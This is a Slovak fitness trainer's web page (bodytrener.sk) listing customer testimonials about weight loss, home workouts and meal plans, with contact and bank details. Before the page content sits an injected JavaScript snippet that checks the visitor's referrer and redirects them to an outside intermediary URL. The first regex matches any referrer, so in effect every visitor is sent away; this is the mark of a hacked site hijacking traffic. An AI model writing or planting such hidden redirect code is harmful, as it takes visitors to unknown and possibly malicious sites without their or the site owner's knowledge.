var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/O7ul2v/intermediary.html?richubaidaninfo"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; Hodnotenia našich zákazníkov | www.bodytrener.sk

Hodnotenia našich zákazníkov

Dano, Bratislava: Ďakujem stránke bodytrener.sk, že mi pomohla dosiahnuť moje vytúžené ciele. Bol som po úraze nohy a nemohol som sa hýbať. Pribral som 15kg a necítil som sa dobre.  Známy mi poradil túto stránku a hneď som aj objednal. Všetko som poctivo dodržiaval čo mi nakázali i keď to bolo obtiažne. Za 3 mesiace som schudol 15kg a som pevnejší ako som bol predtým. Ďakujem Vám a odporúčam ďalším :)

Zdenka, Hurbanovo: Ako maminka 2 malých detí nemám veľa času. Z toho dôvodu nenavštevujem ani fitnes centrum. Po druhom pôrode  som vážila o 10 kíl viac ako predtým a nedarilo sa mi chudnúť. Tak som oslovila trénera Andrej z tejto stránky, hneď sme si potikali a vyrozprávala mu všetko :) Navrhol mi ako si môžem všetko skĺbiť a začala som cvičiť doma. Vyvárala som si chutné jedlá, nebola som hladná a chudla som. Ocenil to hlavne môj manžel a kamarátky, ktoré si všimli, že som schudla. Schudla som zatiať 7kg a idem ďalej, cvičenie ma baví. Ďakujem za všetko i za vybavenie, ktoré ste mi poradil na cvičenie.

Petra, Drietoma: Chcem sa poďakovať Andrejovia  Zuzke, že mi pomohli zostaviť tréning i jedálniček. Pravidelne cvičím 3 krát do týždňa. Cvičenie sa mi začalo páčiť lebo vidím na sebe výsledky. Ďakujem a odporúčam ďalej :)

Anka, Bratislava: Ďakujem za všetko. Cvičiace pomôcky som si objednala od teba a k tomu tréning a jedálniček. Všetko prišlo v poriadku a som spokojná. Prajem veľa úspechov.

Vlado, Trebišov: Ďakujem ti za rady hlavne ohľadom doplnkov výživy a tréningu. Veľmi mi to pomohlo pri mojom silovom tréningu a stále napredujem. Ešte raz dik.

Peter, Stará Ľubovňa: Chcem ti poďakovať za všetky tvoje rady aj keď som sa stále niečo pýtal a bol zvedavý. Pomohlo mi to a hlavne ma začalo cvičenie aj baviť

 Imro, Považská Bystrica: Chcel by som ti v prvom rade poďakovať v mojom mene a mene mojich rodičov. Vďaka tebe ma zobrali na vojenskú akadémiu do Liptovského  Mikuláša. Vo všetkých disciplínach som patril k najlepším aj keď na začiatku som neveril, že to zvládnem.

?ubica, Prešov: Ahoj, Aďo. Ďakujem za tvoje rady, ktoré pomohli splniť moje ciele. Donútila som sa zase cvičiť. Najskôr to bolo doma, ale dostala som sa aj do fitka a to vďaka tebe. Veľmi si vážim všetko čo si pre mňa urobil. Tvoja verná a veľmi spokojná zákazníčka :)

Marek, Detva: Dobrý deň, ja ako spokojný zákazník by som sa rád vyjadril k týmto službám. Zvolil som si objemový jedálniček, tréning a odoslanie kuriérom. Tréning a jedálniček mi bol doručený už na ďalší deň. Bol som milo prekvapený z rýchlosti a dostal som aj pár článkov o chybách, ktoré ma môžu zastaviť pri mojich cieľoch. Tréning a jedálniček bol vytvorený priamo na mňa. Cvičím už 3 týždne a som veľmi spokojný. Všetko dodržiavam a sila už ide hore :) Ďakujem.

Peter, Žilina: Čau, tréning ktorý si mi poslal na doma je úplne super. Nechodím do posilňovne, ale všetko cvičím doma. Kúpil som si od teba aj cvičiace náčinie za pár eur a som spokojný. Cvičím celé telo s  tým. Ešte raz dik.

Laco, Galanta: Ahoj, ďakujem za tréning a jedálniček. Všetko prebehlo rýchlo a k mojej maximálnej spokojnosti.

Ďalšie hodnotenia onedlho…

Potrebujete pomoc?

Adresa:
Bodytrener.sk - Patrik Barčák
Za kalváriou 667/18
02942 Bobrov

Pracovná doba:
Pon – Ned
10:00 – 22:00

E-mail: info@bodytrener.sk
Telefón: +421 910 448 689

Bankový účet:
IBAN: SK1111000000002938482513
Swift: TATRSKBX

© 2013 Bodytrener.sk. Všetky práva vyhradené.

Pridaj si nás na Facebooku